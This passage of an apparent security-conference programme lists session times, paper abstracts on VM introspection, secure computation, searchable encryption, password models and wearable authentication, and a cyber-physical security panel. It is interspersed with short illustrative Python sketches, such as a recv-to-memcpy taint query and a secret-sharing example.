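    # Restrict the graph to data-dependence edges before searching for paths.
    ddg = nx.MultiDiGraph((u, v) for u, v, d in cpg.edges(data=True)
                          if d["label"] == "REACHES")

    sources = [n for n, d in cpg.nodes(data=True) if d.get("name") == "recv"]
    sinks = [n for n, d in cpg.nodes(data=True) if d.get("name") == "memcpy"]
    for src in sources:
        for sink in sinks:
            if ddg.has_node(src) and ddg.has_node(sink) and nx.has_path(ddg, src, sink):
                print(f"possible taint-style flaw: {src} -> {sink}")
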
SoK: Introspections on Trust and the Semantic Gap
Bhushan Jain, Mirza Basim Baig, Dongli Zhang, Donald E. Porter, and Radu Sion (Stony Brook University)
An essential goal of Virtual Machine Introspection (VMI) is assuring security policy enforcement and overall functionality in the presence of an untrustworthy OS. A fundamental obstacle to this goal is the difficulty in accurately extracting semantic meaning from the hypervisor’s hardware-level view of a guest OS, called the semantic gap. Over the twelve years since the semantic gap problem was identified, immense progress has been made in developing powerful VMI tools. Unfortunately, much of this progress has been made at the cost of reintroducing trust into the guest OS, often in direct contradiction to the underlying threat model motivating the introspection. Although this choice is reasonable in some contexts and has facilitated progress, the ultimate goal of reducing the trusted computing base of software systems is best served by a clear-eyed look at the VMI design space.

This paper organizes previous work on VMI based on the essential design considerations behind any VMI system, and then explains how these design choices dictate the trust model and security properties of the overall system. The paper then identifies underexplored portions of the VMI design space, as well as potential adaptations of existing techniques to bridge the semantic gap without trusting the guest OS. Overall, this paper aims to create an essential checkpoint in the broader quest of achieving meaningful trust in virtualized environments through VM introspection.

Lunch

12:15PM - 01:30PM

Session: Secure Computation and Storage

01:30PM - 02:45PM

Automating Efficient RAM-Model Secure Computation
Chang Liu, Yan Huang, Elaine Shi, Michael Hicks, and Jonathan Katz (University of Maryland, College Park)
We describe the first automated approach towards RAM-model secure computation. Towards this end, we define an intermediate representation called SCVM, and a corresponding type system for secure RAM-model computation. Leveraging compile-time optimizations, our approach achieves order-of-magnitude speedup in comparison with naive implementations of RAM-model secure computation.

Our approach fundamentally addresses the inherent limitations of circuit-model secure computation considered in almost all previous works. For programs containing dynamic memory accesses whose addresses depend on secret inputs, existing circuit-model compilers must copy the entire data into the circuit for each dynamic memory access, which is prohibitive when the dataset is large. Our evaluation results show an order-of-magnitude speedup in comparison with the circuit model for reasonably large datasets — and the speedup will be even greater for larger datasets.
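
A minimal sketch of that per-access cost (plain integers stand in for secret-shared or encrypted values): to hide which element a secret index selects, a circuit effectively evaluates a multiplexer over the entire array, so every access costs time linear in the data size.

    # Oblivious read by linear scan: the whole array is touched so that the
    # access pattern reveals nothing about the secret index. RAM-model secure
    # computation replaces this with ORAM-style sublinear access.
    def oblivious_read(array, secret_index):
        result = 0
        for i, value in enumerate(array):
            selector = int(i == secret_index)   # a secure comparison inside a circuit
            result += selector * value          # a secure multiply-and-add
        return result

    data = [7, 13, 42, 99]
    print(oblivious_read(data, secret_index=2))  # 42, after scanning all elements
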
Dynamic Searchable Encryption via Blind Storage
Muhammad Naveed, Manoj Prabhakaran, and Carl A Gunter (University of Illinois at Urbana-Champaign)
Dynamic Searchable Symmetric Encryption (SSE) allows a client to store a dynamic collection of encrypted documents with a server, and later quickly carry out keyword searches on these encrypted documents, while revealing minimal information to the server. In this paper we present a new dynamic SSE scheme that is simpler and more efficient than existing schemes while revealing less information to the server than prior schemes, achieving fully adaptive security against honest-but-curious servers.

We implemented a prototype of our scheme and demonstrated its efficiency on datasets from prior work. Apart from its concrete efficiency, our scheme is also simpler: in particular, it does not require the server to support any operation other than upload and download of data. Thus the server in our scheme can be based solely on a cloud storage service, rather than a cloud computation service as well, as in prior work. In building our dynamic SSE scheme, we introduce a new primitive called Blind Storage, which allows a client to store a set of files on a remote server in such a way that the server does not learn how many files are stored, or the lengths of the individual files; as each file is retrieved, the server learns about its existence (and can notice the same file being downloaded subsequently), but the file’s name and contents are not revealed. This is a primitive with several applications other than SSE, and is of independent interest.
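
A greatly simplified sketch of the placement idea only (the scheme's actual subset sizes, collision handling, and update protocol are not reproduced, and encryption is elided): a PRF keyed by the client and applied to the file name determines which positions of one large block array the file occupies, so the server sees only accesses to apparently random blocks.

    # Simplified Blind-Storage-style placement: HMAC as a PRF maps a file name
    # to pseudorandom positions in a fixed array of equal-sized blocks. The
    # blocks themselves would be encrypted client-side before upload.
    import hashlib
    import hmac

    NUM_BLOCKS = 1 << 16        # size of the server-side block array
    BLOCK_SIZE = 64             # bytes of payload per block

    def block_positions(key: bytes, filename: str, count: int):
        """Derive pseudorandom, distinct block indices for a file."""
        positions, counter = [], 0
        while len(positions) < count:
            tag = hmac.new(key, f"{filename}|{counter}".encode(), hashlib.sha256).digest()
            idx = int.from_bytes(tag[:4], "big") % NUM_BLOCKS
            if idx not in positions:     # naive collision handling, for the sketch only
                positions.append(idx)
            counter += 1
        return positions

    key = b"client-secret-key"
    document = b"example document contents" * 10
    needed = -(-len(document) // BLOCK_SIZE)     # ceiling division
    print(block_positions(key, "report.txt", needed))
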
Wysteria: A Programming Language for Generic, Mixed-mode Multiparty Computations
Aseem Rastogi, Matthew A. Hammer, and Michael Hicks (University of Maryland, College Park)
In a Secure Multiparty Computation (SMC), mutually distrusting parties use cryptographic techniques to cooperatively compute over their private data; in the process each party learns only explicitly revealed outputs. In this paper, we present Wysteria, a high-level programming language for writing SMCs. As with past languages, such as Fairplay, Wysteria compiles secure computations to circuits that are executed by an underlying engine. Unlike past work, Wysteria provides support for mixed-mode programs, which combine local, private computations with synchronous SMCs. Wysteria complements a standard feature set with built-in support for secret shares and with wire bundles, a new abstraction that supports generic n-party computations. We have formalized Wysteria, its refinement type system, and its operational semantics. We show that Wysteria programs have an easy-to-understand single-threaded interpretation and prove that this view corresponds to the actual multi-threaded semantics. We also prove type soundness, a property we show has security ramifications, namely that information about one party's data can only be revealed to another via (agreed upon) secure computations. We have implemented Wysteria, and used it to program a variety of interesting SMC protocols from the literature, as well as several new ones. We find that Wysteria's performance is competitive with hand-rolled approaches while making programming far easier and more trustworthy.
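
As background on the secret-share building block mentioned above (this is generic multiparty-computation machinery, not Wysteria code or its wire-bundle abstraction), a minimal additive secret-sharing sketch:

    # Additive secret sharing over a prime field: each share alone is uniformly
    # random and reveals nothing; the sum of all shares reconstructs the secret.
    import random

    P = 2**61 - 1                         # prime modulus for share arithmetic

    def share(secret: int, n_parties: int):
        shares = [random.randrange(P) for _ in range(n_parties - 1)]
        shares.append((secret - sum(shares)) % P)
        return shares

    def reconstruct(shares):
        return sum(shares) % P

    s = share(1234, n_parties=3)
    print(s)                              # three random-looking field elements
    print(reconstruct(s))                 # 1234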

Break

02:45PM - 03:15PM

Session: Authentication

03:15PM - 04:30PM

An Expressive Model for the Web Infrastructure: Definition and Application to the BrowserID SSO System
Daniel Fett, Ralf Kuesters, and Guido Schmitz (University of Trier)
The web constitutes a complex infrastructure and, as demonstrated by numerous attacks, rigorous analysis of its standards and of web applications is indispensable.

Inspired by successful prior work, in particular the work by Akhawe et al. as well as Bansal et al., in this work we propose a formal model for the web infrastructure. Unlike prior works, which aim at automatic analysis, our model is not yet directly amenable to automation; in return, it is much more comprehensive and accurate with respect to the standards and specifications. As such, it can serve as a solid basis for the analysis of a broad range of standards and applications.

As a case study and another important contribution of our work, we use our model to carry out the first rigorous analysis of the BrowserID system (a.k.a. Mozilla Persona), a recently developed complex real-world single sign-on system that employs technologies such as AJAX, cross-document messaging, and HTML5 web storage. Our analysis revealed a number of very critical flaws that could not have been captured in prior models. We propose fixes for the flaws, formally state relevant security properties, and prove that the fixed system in a setting with a so-called secondary identity provider satisfies these security properties in our model. The fixes for the most critical flaws have already been adopted by Mozilla and our findings have been rewarded by the Mozilla Security Bug Bounty Program.
A Study of Probabilistic Password Models
Jerry Ma, Weining Yang, Min Luo, and Ninghui Li (Purdue University)
A probabilistic password model assigns a probability value to each string. Such models are useful for research into understanding what makes users choose more (or less) secure passwords, for password strength meters, and for password cracking. Guess-number graphs are a widely used method in password research. In this paper, we show that probability-threshold graphs have important advantages over guess-number graphs. They are much faster to compute, and at the same time provide information beyond what is feasible in guess-number graphs, potentially leading to new findings. Curves in probability-threshold graphs correspond naturally to a numerical metric, the Average Negative Log Likelihood (ANLL), which is closely related to other widely used metrics in statistics and language modeling. Using this new and improved methodology, we conduct a systematic evaluation of a large number of probabilistic password models, including Markov models using different normalization and smoothing methods, and find that, among other things, Markov models, when done correctly, significantly outperform the Probabilistic Context-Free Grammar (PCFG) model proposed by Weir et al., which has been considered the state-of-the-art model.
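
As commonly defined (the paper's exact formulation may differ in its details), ANLL averages the negative log-likelihood that a model M assigns to each password in a test set D; lower values mean the model assigns higher probability to the observed passwords:

    \mathrm{ANLL}(D) = \frac{1}{|D|} \sum_{w \in D} -\log_2 \Pr_{M}[w]
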
ZEBRA: Zero-Effort Bilateral Recurring Authentication
Shrirang Mare and Andrés Molina-Markham (Dartmouth College), Cory Cornelius (Intel), and Ronald Peterson and David Kotz (Dartmouth College)
Common authentication methods based on passwords, tokens, or fingerprints perform one-time authentication and rely on users to log out from the computer terminal when they leave. Users, however, often forget to log out, which is a security risk. The most common solution, inactivity timeouts, inevitably compromises either security (too long a timeout) or usability (too short a timeout). One solution is to authenticate users continuously while they are using the terminal and automatically log them out when they leave. Several solutions are based on user proximity, but these are not sufficient: they only confirm whether the user is nearby, not whether the user is actually using the terminal. Proposed solutions based on behavioral biometric authentication (e.g., keystroke dynamics) may not be reliable, as a recent study suggests.

To address this problem we propose Zero-Effort Bilateral Recurring Authentication (ZEBRA). In ZEBRA, a user wears a bracelet (with a built-in accelerometer, gyroscope, and radio) on her dominant wrist. When the user interacts with a computer terminal the bracelet records the wrist movement, processes it, and sends it to the terminal. The terminal compares the wrist movement with the inputs it receives from the user (via keyboard and mouse), and confirms the continued presence of the user only if they correlate. Because the bracelet is on the same hand that provides inputs to the terminal, the accelerometer and gyroscope data should correlate with the input events the terminal receives, since both have the same source – the user’s hand movement. In our experiments ZEBRA performed continuous authentication with 85% accuracy in verifying the correct user and identified all adversaries within 11s. For a different value of a usability parameter, ZEBRA correctly verified 90% of users and identified all adversaries within 50s.
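
A toy sketch of the correlation step (these are not ZEBRA's actual segmentation, features, or classifier; the labels and threshold are invented): interaction labels inferred from the bracelet are compared against labels derived from the terminal's own input events, and the session remains authenticated only while the agreement exceeds a threshold.

    # Toy comparison of bracelet-inferred vs. terminal-observed interactions.
    def authenticated(bracelet_labels, terminal_labels, threshold=0.7):
        matches = sum(b == t for b, t in zip(bracelet_labels, terminal_labels))
        return matches / max(len(terminal_labels), 1) >= threshold

    terminal = ["typing", "typing", "scrolling", "typing", "typing"]
    wearer   = ["typing", "typing", "scrolling", "typing", "scrolling"]
    imposter = ["scrolling", "idle", "idle", "scrolling", "idle"]

    print(authenticated(wearer, terminal))    # True: keep the session active
    print(authenticated(imposter, terminal))  # False: log the terminal out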

NITRD Cyber-Physical Security Panel

04:30PM - 06:00PM

Cyber-Physical Systems offer profound opportunities for innovation in many sectors of our economy, but also present profound challenges for the seamless and secure integration of their computing and physical components. The joint NSF, DHS, and DOT solicitation in CPS is representative of the USG's growing interest in supporting the development of the core science needed to engineer high-confidence CPS. Panelists will highlight the cybersecurity challenges of CPS and promising R&D directions for addressing them, and outline research objectives for the security and CPS communities.

Panelists:
David Corman, Program Officer and CPS Lead, NSF/CISE
Victoria Pillitteri, Smart Grid Cybersecurity and Cyber-Physical Systems Security Lead, Chair, SGIP Cybersecurity Committee, NIST
Scott Tousley, Deputy Director, Cyber Security Division, DHS S&T
Mark (Mohammad) Tehranipoor, Associate Professor, ECE Dept., University of Connecticut, and Director, UCONN CHASE Center and Comcast Center of Excellence in Security Innovation
Ulf Lindqvist, Director, Infrastructure Security Program, SRI International